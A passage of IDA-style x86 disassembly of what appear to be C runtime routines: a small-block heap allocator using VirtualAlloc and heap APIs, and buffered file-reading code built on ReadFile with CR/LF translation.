push ds:dword_4E2EFC
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call ds:dword_42B0E4 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_42153C
loc_421538: ; CODE XREF: sub_4214CB+9B�j
xor eax, eax
jmp short loc_42157F
; ---------------------------------------------------------------------------
loc_42153C: ; CODE XREF: sub_4214CB+6B�j
push 4
push 2000h
push 100000h
push edi
call ds:dword_42B1B8 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_421568
push dword ptr [esi+10h]
push edi
push ds:dword_4E2EFC
call ds:dword_42B0E0 ; RtlFreeHeap
jmp short loc_421538
; ---------------------------------------------------------------------------
loc_421568: ; CODE XREF: sub_4214CB+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4E2EE4
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_42157F: ; CODE XREF: sub_4214CB+6F�j
pop esi
pop edi
retn
sub_4214CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421582 proc near ; CODE XREF: sub_421967+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_42159A
; ---------------------------------------------------------------------------
loc_421597: ; CODE XREF: sub_421582+1A�j
shl eax, 1
inc ebx
loc_42159A: ; CODE XREF: sub_421582+13�j
test eax, eax
jge short loc_421597
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_4215B3: ; CODE XREF: sub_421582+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4215B3
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_42B1B8 ; VirtualAlloc
test eax, eax
jnz short loc_4215E6
or eax, 0FFFFFFFFh
jmp loc_421683
; ---------------------------------------------------------------------------
loc_4215E6: ; CODE XREF: sub_421582+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_421636
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_4215FE: ; CODE XREF: sub_421582+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_4215FE
mov edx, [ebp+var_4]
loc_421636: ; CODE XREF: sub_421582+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_421673
or [eax+4], edi
loc_421673: ; CODE XREF: sub_421582+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_421683: ; CODE XREF: sub_421582+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_421582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421688 proc near ; CODE XREF: sub_41E3C2+63�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_42182A
test bl, 1
jnz loc_421823
add ebx, ecx
cmp esi, ebx
jg loc_421823
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_4216FD
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_4216FD: ; CODE XREF: sub_421688+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_421748
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_421729
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_421748
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_421748
; ---------------------------------------------------------------------------
loc_421729: ; CODE XREF: sub_421688+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_421748
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_421748: ; CODE XREF: sub_421688+7B�j
; sub_421688+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_421811
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_421782
push 3Fh
pop edi
loc_421782: ; CODE XREF: sub_421688+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_4217FF
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_4217D6
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_4217CE
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4217CE: ; CODE XREF: sub_421688+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_4217F6
; ---------------------------------------------------------------------------
loc_4217D6: ; CODE XREF: sub_421688+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_4217EC
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4217EC: ; CODE XREF: sub_421688+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_4217F6: ; CODE XREF: sub_421688+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4217FF: ; CODE XREF: sub_421688+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_421814
; ---------------------------------------------------------------------------
loc_421811: ; CODE XREF: sub_421688+DE�j
mov edx, [ebp+arg_4]
loc_421814: ; CODE XREF: sub_421688+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_42195F
; ---------------------------------------------------------------------------
loc_421823: ; CODE XREF: sub_421688+50�j
; sub_421688+5A�j
xor eax, eax
jmp loc_421962
; ---------------------------------------------------------------------------
loc_42182A: ; CODE XREF: sub_421688+47�j
jge loc_42195F
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_421855
push 3Fh
pop esi
loc_421855: ; CODE XREF: sub_421688+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_4218DF
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_42186E
push 3Fh
pop esi
loc_42186E: ; CODE XREF: sub_421688+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4218B8
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_421899
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4218B5
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4218B5
; ---------------------------------------------------------------------------
loc_421899: ; CODE XREF: sub_421688+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4218B5
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4218B5: ; CODE XREF: sub_421688+208�j
; sub_421688+20F�j ...
mov ebx, [ebp+arg_4]
loc_4218B8: ; CODE XREF: sub_421688+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4218DF
push 3Fh
pop esi
loc_4218DF: ; CODE XREF: sub_421688+1D1�j
; sub_421688+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_421956
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_42192D
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_421925
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_421925: ; CODE XREF: sub_421688+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_42194D
; ---------------------------------------------------------------------------
loc_42192D: ; CODE XREF: sub_421688+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_421943
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_421943: ; CODE XREF: sub_421688+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_42194D: ; CODE XREF: sub_421688+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_421956: ; CODE XREF: sub_421688+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_42195F: ; CODE XREF: sub_421688+196�j
; sub_421688:loc_42182A�j
xor eax, eax
inc eax
loc_421962: ; CODE XREF: sub_421688+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_421688 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421967 proc near ; CODE XREF: sub_41E3C2+74�p
; sub_41E561+17�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_4E2EE4
mov edx, ds:dword_4E2EE8
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_4219A4
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4219B1
; ---------------------------------------------------------------------------
loc_4219A4: ; CODE XREF: sub_421967+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_4219B1: ; CODE XREF: sub_421967+3B�j
mov eax, ds:dword_4E2EF0
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_4219D3
; ---------------------------------------------------------------------------
loc_4219BF: ; CODE XREF: sub_421967+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4219D8
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_4219D3: ; CODE XREF: sub_421967+56�j
mov [ebp+arg_0], ebx
jb short loc_4219BF
loc_4219D8: ; CODE XREF: sub_421967+64�j
cmp ebx, [ebp+var_4]
jnz short loc_421A01
mov ebx, edx
jmp short loc_4219F2
; ---------------------------------------------------------------------------
loc_4219E1: ; CODE XREF: sub_421967+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4219F9
add ebx, 14h
loc_4219F2: ; CODE XREF: sub_421967+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_4219E1
loc_4219F9: ; CODE XREF: sub_421967+86�j
cmp ebx, eax
jz loc_421A95
loc_421A01: ; CODE XREF: sub_421967+74�j
; sub_421967+170�j
mov ds:dword_4E2EF0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_421A28
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_421A5E
loc_421A28: ; CODE XREF: sub_421967+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_421A5B
loc_421A44: ; CODE XREF: sub_421967+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_421A44
loc_421A5B: ; CODE XREF: sub_421967+DB�j
mov edx, [ebp+var_4]
loc_421A5E: ; CODE XREF: sub_421967+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_421AE7
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_421AE7
; ---------------------------------------------------------------------------
loc_421A89: ; CODE XREF: sub_421967+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_421A9A
add ebx, 14h
mov [ebp+arg_0], ebx
loc_421A95: ; CODE XREF: sub_421967+94�j
cmp ebx, [ebp+var_4]
jb short loc_421A89
loc_421A9A: ; CODE XREF: sub_421967+126�j
cmp ebx, [ebp+var_4]
jnz short loc_421AC5
mov ebx, edx
jmp short loc_421AAC
; ---------------------------------------------------------------------------
loc_421AA3: ; CODE XREF: sub_421967+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_421AB3
add ebx, 14h
loc_421AAC: ; CODE XREF: sub_421967+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_421AA3
loc_421AB3: ; CODE XREF: sub_421967+140�j
cmp ebx, eax
jnz short loc_421AC5
call sub_4214CB
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_421ADD
loc_421AC5: ; CODE XREF: sub_421967+136�j
; sub_421967+14E�j
push ebx
call sub_421582
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_421A01
loc_421ADD: ; CODE XREF: sub_421967+15C�j
xor eax, eax
jmp loc_421C5E
; ---------------------------------------------------------------------------
loc_421AE4: ; CODE XREF: sub_421967+182�j
shl ecx, 1
inc edi
loc_421AE7: ; CODE XREF: sub_421967+111�j
; sub_421967+120�j
test ecx, ecx
jge short loc_421AE4
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_421B08
push 3Fh
pop esi
loc_421B08: ; CODE XREF: sub_421967+19C�j
cmp esi, edi
jz loc_421C11
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_421B74
cmp edi, 20h
mov ebx, 80000000h
jge short loc_421B48
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_421B71
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_421B74
; ---------------------------------------------------------------------------
loc_421B48: ; CODE XREF: sub_421967+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_421B71
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_421B74
; ---------------------------------------------------------------------------
loc_421B71: ; CODE XREF: sub_421967+1D5�j
; sub_421967+1FD�j
mov ebx, [ebp+arg_0]
loc_421B74: ; CODE XREF: sub_421967+1AF�j
; sub_421967+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_421C1D
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_421C0E
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_421BE5
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_421BD3
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_421BD3: ; CODE XREF: sub_421967+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_421C0E
; ---------------------------------------------------------------------------
loc_421BE5: ; CODE XREF: sub_421967+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_421BF8
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_421BF8: ; CODE XREF: sub_421967+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_421C0E: ; CODE XREF: sub_421967+247�j
; sub_421967+27C�j
mov ecx, [ebp+var_8]
loc_421C11: ; CODE XREF: sub_421967+1A3�j
test ecx, ecx
jz short loc_421C20
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_421C20
; ---------------------------------------------------------------------------
loc_421C1D: ; CODE XREF: sub_421967+223�j
mov ecx, [ebp+var_8]
loc_421C20: ; CODE XREF: sub_421967+2AC�j
; sub_421967+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_421C56
cmp ebx, ds:dword_4E2EE0
jnz short loc_421C56
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4E2EF8
jnz short loc_421C56
and ds:dword_4E2EE0, 0
loc_421C56: ; CODE XREF: sub_421967+2D3�j
; sub_421967+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_421C5E: ; CODE XREF: sub_421967+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_421967 endp
; =============== S U B R O U T I N E =======================================
sub_421C63 proc near ; CODE XREF: sub_41E2D9+AA�p
; sub_41EA5D+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_421D3C
test al, 40h
jnz loc_421D3C
test al, 2
jz short loc_421C8A
or eax, 20h
mov [esi+0Ch], eax
jmp loc_421D3C
; ---------------------------------------------------------------------------
loc_421C8A: ; CODE XREF: sub_421C63+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_421C9F
push esi
call sub_4269FF
pop ecx
jmp short loc_421CA4
; ---------------------------------------------------------------------------
loc_421C9F: ; CODE XREF: sub_421C63+31�j
mov eax, [esi+8]
mov [esi], eax
loc_421CA4: ; CODE XREF: sub_421C63+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_421D41
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_421D2B
cmp eax, 0FFFFFFFFh
jz short loc_421D2B
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_421D00
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_421CE6
mov edi, ecx
sar edi, 5
mov edi, ds:dword_4E2BA0[edi*4]
and ecx, 1Fh
lea edi, [edi+ecx*8]
jmp short loc_421CEB
; ---------------------------------------------------------------------------
loc_421CE6: ; CODE XREF: sub_421C63+6D�j
mov edi, offset dword_443A40
loc_421CEB: ; CODE XREF: sub_421C63+81�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_421D00
or edx, 2000h
mov [esi+0Ch], edx
loc_421D00: ; CODE XREF: sub_421C63+64�j
; sub_421C63+92�j
cmp dword ptr [esi+18h], 200h
jnz short loc_421D1D
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_421D1D
test ch, 4
jnz short loc_421D1D
mov dword ptr [esi+18h], 1000h
loc_421D1D: ; CODE XREF: sub_421C63+A4�j
; sub_421C63+AC�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_421D2B: ; CODE XREF: sub_421C63+57�j
; sub_421C63+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_421D3C: ; CODE XREF: sub_421C63+A�j
; sub_421C63+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_421C63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D41 proc near ; CODE XREF: sub_41E2D9+91�p
; sub_421C63+4A�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
cmp esi, ds:dword_4E2B98
push edi
jnb loc_421F16
mov eax, esi
sar eax, 5
lea edi, ds:4E2BA0h[eax*4]
mov eax, [edi]
and esi, 1Fh
shl esi, 3
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_421F16
and [ebp+var_C], 0
cmp [ebp+arg_8], 0
mov ebx, [ebp+arg_4]
mov ecx, ebx
jz short loc_421DEC
test dl, 2
jnz short loc_421DEC
test dl, 48h
jz short loc_421DB6
cmp byte ptr [eax+5], 0Ah
jz short loc_421DB6
mov eax, [edi]
mov al, [eax+esi+5]
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea ecx, [ebx+1]
mov [ebp+var_C], 1
mov byte ptr [eax+esi+5], 0Ah
loc_421DB6: ; CODE XREF: sub_421D41+51�j
; sub_421D41+57�j
push 0
lea eax, [ebp+var_10]
push eax
push [ebp+arg_8]
mov eax, [edi]
push ecx
push dword ptr [eax+esi]
call ds:dword_42B080 ; ReadFile
test eax, eax
jnz short loc_421DFF
call ds:dword_42B01C ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_421DE7
mov ds:dword_4E28F8, ecx
jmp loc_421F1D
; ---------------------------------------------------------------------------
loc_421DE7: ; CODE XREF: sub_421D41+99�j
cmp eax, 6Dh
jnz short loc_421DF3
loc_421DEC: ; CODE XREF: sub_421D41+47�j
; sub_421D41+4C�j
xor eax, eax
jmp loc_421F2A
; ---------------------------------------------------------------------------
loc_421DF3: ; CODE XREF: sub_421D41+A9�j
push eax
call sub_422C0F
pop ecx
jmp loc_421F27
; ---------------------------------------------------------------------------
loc_421DFF: ; CODE XREF: sub_421D41+8C�j
mov eax, [ebp+var_10]
mov ecx, [edi]
add [ebp+var_C], eax
test byte ptr [ecx+esi+4], 80h
jz loc_421F11
test eax, eax
jz short loc_421E26
cmp byte ptr [ebx], 0Ah
jnz short loc_421E26
mov eax, ecx
lea eax, [eax+esi+4]
or byte ptr [eax], 4
jmp short loc_421E2F
; ---------------------------------------------------------------------------
loc_421E26: ; CODE XREF: sub_421D41+D3�j
; sub_421D41+D8�j
mov eax, [edi]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FBh
loc_421E2F: ; CODE XREF: sub_421D41+E3�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], eax
mov [ebp+var_C], ecx
jnb loc_421F0B
loc_421E45: ; CODE XREF: sub_421D41+1B2�j
mov eax, [ebp+var_8]
mov al, [eax]
cmp al, 1Ah
jz loc_421EFB
cmp al, 0Dh
jz short loc_421E61
mov [ebx], al
inc ebx
inc [ebp+var_8]
jmp loc_421EED
; ---------------------------------------------------------------------------
loc_421E61: ; CODE XREF: sub_421D41+113�j
dec ecx
cmp [ebp+var_8], ecx
jnb short loc_421E7B
mov eax, [ebp+var_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_421E76
add [ebp+var_8], 2
jmp short loc_421ECF
; ---------------------------------------------------------------------------
loc_421E76: ; CODE XREF: sub_421D41+12D�j
mov [ebp+var_8], eax
jmp short loc_421EE9
; ---------------------------------------------------------------------------
loc_421E7B: ; CODE XREF: sub_421D41+124�j
inc [ebp+var_8]
push 0
lea eax, [ebp+var_10]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call ds:dword_42B080 ; ReadFile
test eax, eax
jnz short loc_421EA3
call ds:dword_42B01C ; RtlGetLastWin32Error
test eax, eax
jnz short loc_421EE9
loc_421EA3: ; CODE XREF: sub_421D41+156�j
cmp [ebp+var_10], 0
jz short loc_421EE9
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_421EC4
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_421ECF
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_421EEC
; ---------------------------------------------------------------------------
loc_421EC4: ; CODE XREF: sub_421D41+16F�j
cmp ebx, [ebp+arg_4]
jnz short loc_421ED4
cmp [ebp+var_1], 0Ah
jnz short loc_421ED4
loc_421ECF: ; CODE XREF: sub_421D41+133�j
; sub_421D41+176�j
mov byte ptr [ebx], 0Ah
jmp short loc_421EEC
; ---------------------------------------------------------------------------
loc_421ED4: ; CODE XREF: sub_421D41+186�j
; sub_421D41+18C�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_42569D
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_421EED
loc_421EE9: ; CODE XREF: sub_421D41+138�j
; sub_421D41+160�j ...
mov byte ptr [ebx], 0Dh
loc_421EEC: ; CODE XREF: sub_421D41+181�j
; sub_421D41+191�j
inc ebx
loc_421EED: ; CODE XREF: sub_421D41+11B�j
; sub_421D41+1A6�j
mov ecx, [ebp+var_C]
cmp [ebp+var_8], ecx
jb loc_421E45
jmp short loc_421F0B
; ---------------------------------------------------------------------------
loc_421EFB: ; CODE XREF: sub_421D41+10B�j
mov eax, [edi]
test byte ptr [eax+esi+4], 40h
jnz short loc_421F0B
lea esi, [eax+esi+4]
or byte ptr [esi], 2
loc_421F0B: ; CODE XREF: sub_421D41+FE�j
; sub_421D41+1B8�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_C], ebx
loc_421F11: ; CODE XREF: sub_421D41+CB�j
mov eax, [ebp+var_C]
jmp short loc_421F2A
; ---------------------------------------------------------------------------
loc_421F16: ; CODE XREF: sub_421D41+12�j
; sub_421D41+34�j
and ds:dword_4E28F8, 0
loc_421F1D: ; CODE XREF: sub_421D41+A1�j
